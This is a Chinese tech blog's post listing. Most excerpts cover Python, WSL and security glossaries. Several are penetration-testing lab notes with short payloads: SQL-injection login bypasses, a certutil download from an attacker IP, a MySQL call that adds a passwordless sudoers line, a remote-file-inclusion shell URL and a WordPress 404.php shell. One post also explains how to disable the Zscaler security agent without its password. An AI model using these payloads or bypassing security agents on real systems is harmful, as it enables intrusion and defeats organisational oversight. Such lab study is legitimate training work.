- 博客(200)
- 资源 (11)
- 收藏
- 关注
RSS订阅原创 0基础开始入门代码审计
index是一个程序的入口文件,通常读一遍index文件就可以大致了解整个程序的架构、运行的流程、包含到的文件,其中核心文件有哪些。通读全文代码时,首先应看程序的代码结构,如主目录有哪些文件,模块目录有哪些文件,插件目录有哪些文件,除了。有哪些文件,还要注意文件的大小、创建时间。等关键字,这类文件主要是对参数进行过滤,关系到我们找到的可疑点能否利用。(1)文件上传功能:文件上传漏洞、文件名SQL注入漏洞。(2)文件管理功能:任意文件操作漏洞、XSS漏洞。、寻找敏感功能点,通读功能点代码。
2023-08-20 18:01:59
285
原创 【python对比list列表里的dict字典差异,非difference方式】
按照传统方式使用set.difference方式不可行,因为list内部是字典类型,会报错,所以可以使用如下方式得到结果。
2023-01-06 15:17:38
446
原创 python 读取word文件,报错zipfile.BadZipfile: File is not a zip file
【代码】python 读取word文件,报错zipfile.BadZipfile: File is not a zip file。
2022-10-27 10:39:20
1996
原创 pip报错解决 WinError 10013
)’: /simple/docx/造成这个问题的原因是防火墙的问题,本机问题是卡巴斯基进行了拦截,直接退出卡巴斯基就解决问题了。
2022-10-11 18:10:15
655
原创 shell脚本切换用户权限到root
这个解决方案是用于将普通用户权限切换到root权限,不是脚本内执行的,脚本内切换权限的没那么麻烦。ddddd换为sudo密码即可。切换root密码权限的语句也可以根据环境的不一样来修改。
2022-09-19 16:30:28
4174
4
原创 python写入文件后读取空白,写入文件无法读取解决方案
原因:内容被写入后,光标自动移动到内容末尾,此时直接进行read将返回空字符串。但是使用file.seek(0)会将光标移动到开头,此时可以正确读出内容。若要在写入文件后读出所写内容,需要加入代码:file.seek(0),否则将返回空字符串(file指的是文件夹名称)。w+,a+模式也一样。
2022-09-06 18:52:07
2128
原创 在有本地管理员权限的前提下,不知道密码,如何关闭zscaler
前提是有本地电脑的管理员权限,然后开始操作。一是删除注册表,目录如下:计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Zscaler Inc.\Zscaler二是删除相关文件,没权限的直接跳过:C:\Program Files\Zscaler三是关闭相关服务,通过任务管理器自行查找。四是根据进程名批量关闭进程五是修改服务的自启动为手动启动相关的东西多折腾几次,进程就消失了,也可以在关闭进程的同时删除exe文件,这样服务就起不来了。最终结果就是只有一个manager进程还在,其他进程都没了
2022-07-01 12:52:08
3775
原创 powershell写windows服务的方法研究
powershell写windows服务的方法研究最简单的方法一,下载软件,参考文档首先下载powershell studio,地址:https://www.sapien.com/software/powershell_studio 点击直达然后参照官方说明,https://www.sapien.com/blog/2017/07/12/write-a-windows-service-in-powershell/ 点击直达二,截图说明下载安装好软件之后找到Package按钮,点开里面有个设置,点
2022-05-24 15:11:40
488
1
原创 记录一个简单的python3多线程模型
import timeimport threadingdef doWaiting():print(‘start waiting:’, time.strftime(‘%H:%M:%S’))time.sleep(1)print(‘stop waiting’, time.strftime(‘%H:%M:%S’))for i in range(3):t = threading.Thread(target=doWaiting)t.start()# 确保线程t已经启动print(‘start joi
2022-04-11 14:13:44
820
原创 windows访问虚拟机内的虚拟机
本文大概通用以下问题:windows访问虚拟机内的docker,windows访问虚拟机内的虚拟机,windows访问WSL里的docker ubuntu系统,windows访问同局域网下其他电脑的虚拟机等。情景大概是三台电脑或者系统。A和B互通,B和C互通。但是A访问不了C的解决方案。在A上执行route -p add B和C共用的网段 mask 255.255.0.0 B的地址如:route -p add 172.18.0.0 mask 255.255.0.0 172.31.150
2022-03-29 15:59:14
5834
2
原创 Win10 WSL2 linux 子系统安装Docker
背景由于开发需要linux环境,于是windows系统下安装了ubuntu子系统,但是无法通过正常方式安装docker,于是有了如下操作步骤下面为大家详细介绍具体的操作步骤。安装Docker首先进入Ubuntu shell,更换Ubuntu官方源为国内源,加快下载速度。执行。vim /etc/apt/sources.list将内容替换为下方:deb http://mirrors.aliyun.com/ubuntu/ focal main restricteddeb http://mirro
2022-03-10 14:00:00
981
原创 windows子系统linux备份、还原系统
备份命令:wsl --export Ubuntu E:\temp\Ubuntu-20220304.tar还原命令:wsl --import Ubuntu E:\temp\Ubuntu-20220304.tar删除命令:wsl --unregister Ubuntu 运行:wsl --distribution Ubuntu或者wsl -d Ubuntu查看运行中:wsl -l --running停止:wsl -t Ubuntu或者wsl --terminate Ubun
2022-03-04 17:14:41
6849
原创 win10、win11安装linux子系统
首先搜索【启用或关闭 Winsows 功能】然后勾选【适用于linux的Windows子系统】和【虚拟平台】以管理员身份打开 PowerShell 并运行dism.exe /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart管理员身份打开powershell:winget install -e --id Canonical.Ubuntu等待安装完成。以上例子为ubuntu
2022-03-04 15:50:24
402
原创 powershell踩坑-代码被当成文字打印出来
直接说吧,原因就是powershell脚本的if和elif之类的写法,大括号不能写到下面。举列子:正确的写法:if(xx){}错误的写法:if(xx){}
2022-01-11 18:16:40
155
原创 企业安全建设-蜜标(honeytokens)
什么是honeytokens?简单来说就是有人打开某个文件时,你能实时知道这个文件被人打开了。可以是excel文件,也可以是word文件,甚至是图片、某个应用的key。所以在各种复杂的生产和办公环境中,我们可以设置更多独立的陷阱,而不仅仅是蜜罐。
2021-12-02 10:55:03
4870
1
原创 安全体系建设-基础安全
安全体系建设安全层级建设步骤组建安全团队工作内容**生产:**安全层级安全体系的建设需要进行分级,粗略的分为以下三个层级。基础安全第一阶段大部分公司关注的层级,充当应急的角色,在不断的应急中了解公司的架构、业务情况,并再次基础上建立安全防御体系,也是给企业打好基础的阶段,这一阶段主要的对手为传统意义上的黑客。安全流程和制度随着第一阶段的查缺补漏,安全防御体系基本建立完成,这是就可以考虑通过流程/制度的方式规范员工的行为。业务安全安全最终服务于业务。因为业务安全也是安全团队比较重要
2021-12-01 14:14:03
4129
原创 九、ISO 27000 术语定义及相关资料
编者说明:此处使用的 27000 术语定义来自国标转化的 27000 标准 ISO 27000:2016(GB/T 29246— 2017/ ISO/IEC 27000: 2016 信息技术 安全技术 信息安全管理体系 概述和词汇)。其中编号按原文编号排列。ISO 27000:2016 对术语定义有下列说明:ISMS 标准族的术语归属者是指最初定义该术语的标准。术语归属者还要负责对定义进行维护,即提供、评审、更新和删除。ISO/IEC27000 本身不定义任何术语。ISO/IEC27001 和 I
2021-11-09 10:31:55
2371
原创 八、CISP 教材缩略语(2019 版)
缩写 英文 中文A ASME American Society of Mechanical Engineers 美国机械工程师协会AES Advanced Encryption Standard 高级加密标准AS Authentication Server 认证服务AAA Authentication、Authorization、Accounting 认证、授权和计费AC Attribute Certificate 属性证书ADF Access Control Decision Functi
2021-11-09 10:27:45
2287
原创 七、CISSP 认证考试指南(AIO)第 7 版术语表
9.1 A9.1.1 access 访问主体查看、更改客体或与客体通信的能力。访问支持信息在主体和客体之间的流动。9.1.2 access control 访问控制限制只有被授权主体才能访问资源的机制、控制和方法。9.1.3 access control list (AGL) 访问控制列表,ACL被授权访问特定客体的主体列表。通常,通过 ACL 可以读、写、执行、添加、更改、删除和创建访问的类型。9.1.4 access control mechanism 访问控制机制管理、物理或技术性控制
2021-11-09 10:15:26
5826
原创 六、CISSP 官方学习指南(OSG)第 7 版术语对照表
8.1 数字和符号8.1.1 *(星)完整性公理: (*公理)Biba 模型的公理,规定在特定分类级别上的主体不能向较高分类级别写入数据。这通常会被缩略为"不能向上写"。8.1.2 *(星)安全属性: (*属性)Bel1-LaPadula 模型的属性,规定在特定分类级别上的主体不能向较低分类级别写入数据。这通常会被缩略为"不能向下写"。8.1.3 802.11i(WPA-2)对 802.11 标准的修正,定义了新的身份认证以及类似于 IPSec 的加密技术。迄今为止, 还不存在能够危害已正确配置
2021-11-09 10:12:13
4609
原创 五、信息安全术语中英文词条对照表
序号 中文词条 英文词条(N)中继 (N)-relay抽象语法 abstract syntax访问/存取 access访问控制 access control访问(存取)控制证书 access control certificate访问控制判决功能 Access control Decision Function(ADF)访问控制判决信息 Access control Decision Information(ADI)访问控制实施功能 Access contro
2021-11-09 10:09:05
1276
原创 四、资讯安全网词汇表
6.1 A6.1.1 接达控制系统 (Access Control System)保证电脑资源只供获授权人士使用。6.1.2 地址仿冒 (Address Spoofing)地址欺骗即假冒他人地址,例如互联网规约地址仿冒。6.1.3 行政性保安 (Administrative Security)运用管理程序和机制以防止未获授权接达系统。6.1.4 广告软件 (Adware)当广告软件运行时会显示广告标语。很多广告软件同时也是间谍软件。6.1.5 高级加密标准运算法 (Advanced Enc
2021-11-09 10:00:44
3745
原创 三、Oracle 网络安全词汇表
来自:《在 Oracle® Solaris 11.2 中确保网络安全》5.1 3DES请参见 Triple-DES(三重 DES)。5.2 AESAdvanced Encryption Standard(高级加密标准)。一种对称的块数据加密技术。美国政府在 2000 年 10 月采用该种算法的 Rijndael 变体作为其加密标准。AES 从而取代了 DES 成为政府的加密标准。5.3 asymmetric key cryptography(非对称密钥密码学)一种加密系统,消息的发送者和接收者
2021-11-09 09:58:21
4539
原创 二、中英文最全的网络安全术语表-学网络安全必备
4 中英文最全的网络安全术语表按字母 A-Z 顺序排列,用简单的中英文解释,让你了解到最全的网络安全术语。4.1 A4.1.1 高级持久威胁(APT)一种网络攻击,使用复杂的技术持续对目标政府和公司进行网络间谍活动或其他恶意活动。通常由具有丰富专业知识和大量资源的对手进行-通常与民族国家参与者相关。这些攻击往往来自多个入口点,并且可能使用多个攻击媒介(例如,网络攻击,物理攻击,欺骗攻击)。一旦系统遭到破坏,结束攻击可能非常困难。4.1.2 警报(Alert)关于已检测到或正在进行信息系统网络安
2021-11-08 17:34:49
8396
1
原创 一、网络安全专有名词汇编详解(黑话指南)-史上最全
1 编者前言本文档是基于网络公开资料整理而成,属于个人笔记性质。需要什么词语直接Ctrl+f然后搜索即可。主要内容是汇编了一些网络安全的词汇表、术语表,可用于日常网络安全知识学习,或工作/考试中的速查。有些涉及中英文对照的地方,可能原译者描述的比较费解,建议参考英文原文,或对照其它资料理解。网络安全术语更新很快,一些最新的词汇或术语可能在本文档中查询不到,建议上网查询或咨询专家。因为文字扫描识别或编辑整理的问题,文档中可能存在一些文字上的错误,欢迎网友指出,希望将来有机会更新修订;另外,也欢迎网友
2021-11-08 17:29:21
4983
原创 租住南山的互联网大厂人:年入70万,睡城中村单间
今年7月份,刘禹坐在房东的小电驴后座,顶着烈日来到位于南山高新中四路的凯丽花园。这是个建于上个世纪90年代的老住宅区,斑驳的楼体、生锈的窗栏印证着它的年龄。不过,它距离腾讯大厦仅有数百米,在夏天这个租房高峰季,可谓一房难求。刘禹要看的房子,是一间逼仄的隔断间,不到20平方米,床头紧挨着洗脸池,同一套住宅里还住着另外四个房客,唯一不错的就是隔断间里有独立卫生间。房东带刘禹看房时,房间里还站着中介带来的两个腾讯员工。刘禹看过之后,不敢迟疑,下楼后立马提出跟房东签合同。这时,中介...
2021-11-08 15:06:36
786
原创 花了1000个小时才考过的安全证书,这是总结出来的精髓笔记。
10.11.1.139 root 搜索思路windows下:certutil.exe -urlcache -split -f "http://$IP/Powerless.bat" Powerless.bat windows下载文件for /r Users %i in (*.ps1) do @echo %i 查找文件for /r c:/ %i in (*.txt) do @echo %ifindstr /s /i /n "aad3b435b51404eeaad3b435b51404ee" *.* ...
2021-11-06 10:18:45
741
原创 渗透测试防御-sql万能密码、mysql提权
http://10.11.1.252:8000登陆后台用123' or 1=1 #或者123' or '1'='1绕过登陆 获取用户名密码[email protected] -p 22000跑一下提权脚本,linEnum.sh,发现mysql以root权限在运行。lordoftherootselectdo_system('echo "j0hn ALL =(ALL) NOPASSWD: ALL">> /etc...
2021-11-05 11:49:53
801
原创 网络防御与对抗-wp漏洞利用
wpscan-u http://10.11.1.251/wp/ --enumeratevpvt是扫描主题漏洞扫描插件漏洞wp-forum - SQL Injection参考连接:Wordpress wp-forum plugin SQL Injection - CXSecurity.comhttp://10.11.1.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_c...
2021-11-05 11:48:08
788
原创 网络攻防-wp cms利用
http://10.11.1.234/wp-login.php?redirect_to=http%3A%2F%2F10.11.1.234%2Fwp-admin%2Fusers.php&reauth=1wpscan可以爆破密码admin princess修改Appearance 404.php为以下shellhttps://www.jb51.net/article/17844.htm访问任意不存在页面即可反弹,http://10.11.1.234/?p=9991...
2021-11-05 11:46:29
718
原创 网络防御与学习-tomcat 默认密码利用
10.11.1.209Nikto扫描得到:Defaultaccount found for 'Tomcat Manager Application' at /manager/html (ID 'tomcat', PW 'tomcat'). Apache Tomcat.访问8080端口,找到后台登录地址,尝试tomcat tomcat顺利登录后台。Apache Tomcat - Account Scanner / 'PUT' Request Command Execution - Mu...
2021-11-05 11:43:36
518
原创 渗透测试三合一-仅供参考
10.11.1.141搜索webmin,确定使用2017.plperl2017.pl 10.11.1.141 10000 /root/proof.txtloading1 (alice)BUGZBUNNY (bob)10.11.1.145完成nmap-p 445 --script vuln 10.11.1.145CVE-2009-3103msf搜索用:exploit/windows/smb/ms09_050_sm...
2021-11-05 11:38:23
1202
原创 渗透测试学习-Remote File Inclusion shell
http://10.11.1.133/1f2e73705207bdd6467e109c1606ed29-21213/111111111/slogin_lib.inc.php?slogin_path=http://10.11.0.86/Let's kick shell-ish, Part 2: Remote File Inclusion shell – Techorganic – Musings from the brainpancat /etc/fstab搜索 reiserfs explo.
2021-11-05 11:34:08
1251
原创 网络渗透测试安全攻防-Cuppa CMS 文件包含漏洞
目录扫描,拿到登陆地址http://10.11.1.116/db/phpliteadmin.php adminphpliteadmin1.9.3PHPLiteAdmin 1.9.3 - Remote PHP Code Injection - PHP webapps ExploitCuppaCMS文件包含漏洞http://10.11.1.116/administrator/alerts/alertConfigField.php?urlConfig=../../../../.....
2021-11-05 11:30:48
1646
原创 网络攻防渗透测试-ms11-046 提权
http://10.11.1.73:8014/LICENSE/http://10.11.1.73:8014/content/http://10.11.1.73:8080/php/http://10.11.1.73:8080/PHP/install/install.txt找到账号密码groups Options勾选Personal disk spaceSitesOvidentiaFile upload configuration C:\wamp\www\PHP\...
2021-11-05 11:29:24
851
网络安全词汇术语汇编-v3.0.1.pdf
2021-11-05
Linux_基础教程--Shell脚本编程.ppt
2018-06-07
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人